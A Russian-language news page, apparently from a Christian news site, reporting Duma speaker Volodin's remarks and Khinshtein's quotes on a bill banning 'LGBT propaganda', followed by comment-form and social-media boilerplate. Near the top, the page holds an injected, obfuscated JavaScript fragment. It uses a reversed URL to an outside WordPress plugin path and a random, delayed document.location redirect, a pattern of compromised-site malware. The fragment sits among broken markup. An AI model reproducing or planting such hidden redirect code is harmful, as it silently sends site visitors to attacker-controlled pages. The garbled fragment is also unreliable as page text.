Закон о запрете ЛГБТ-пропаганды в России


toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>

Закон о запрете ЛГБТ-пропаганды будет принят в ноябре — Володин
Законопроект о запрете ЛГБТ-пропаганды и пропаганды педофилии, как ожидается, станет законом уже в ноябре, заявил председатель Госдумы Вячеслав Володин.

«На следующей неделе должен быть внесен как межфракционный, в течение следующей недели принят в первом чтении, затем второе, третье — и направляем в Совет Федерации, в ноябре, надеемся, закон ляжет на стол к президенту», — сказал Володин в понедельник на слушаниях в Госдуме.

Он допустил, что слушания по данным проектам законов «будут по-разному трактовать, и, совершенно очевидно, будут говорить о том, что Дума опять что-то хочет запретить».

«Нет. В данном случае мы обсуждаем с вами законодательные инициативы, которые призваны защитить граждан, защитить права. Не ограничить в правах, а защитить от пропаганды», — отметил Володин.

По словам спикера, «в два раза больше жителей нашей страны говорят, что нетрадиционные ценности их достали, и эта пропаганда совершенно очевидно наносит вред, мы должны от этого защититься».

Законопроектом предлагается предусмотреть в статье 6.21 Кодекса об административных правонарушениях ответственность за пропаганду нетрадиционных сексуальных отношений или предпочтений среди любых социальных групп, в том числе повышенные меры административной ответственности за совершение данных действий среди несовершеннолетних, с применением СМИ или информационно-телекоммуникационных сетей, в том числе интернета, а также за совершение таких действий иностранным гражданином или лицом без гражданства.

Кроме того, законопроектом предлагается установить административную ответственность за пропаганду педофилии и за распространение среди несовершеннолетних информации, демонстрирующий нетрадиционные сексуальные отношения и предпочтения.

«Таким образом, мы запрещаем именно пропаганду, а не ее упоминание. Поэтому, например, «Лолита» Набокова не будет являться пропагандой, потому что никто из читателей не захочет повторить трагическую судьбу Гумберта или самой Лолиты. А «Лето в пионерском галстуке» — будет», — заявил автор проекта закона, глава комитета по информационной политике Александр Хинштейн.

В слушаниях приняли участие эксперты, представители традиционных религий, общественные деятели, руководители СМИ.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Открытая семинарияTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, Facebook, ВКонтакте

5/5

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.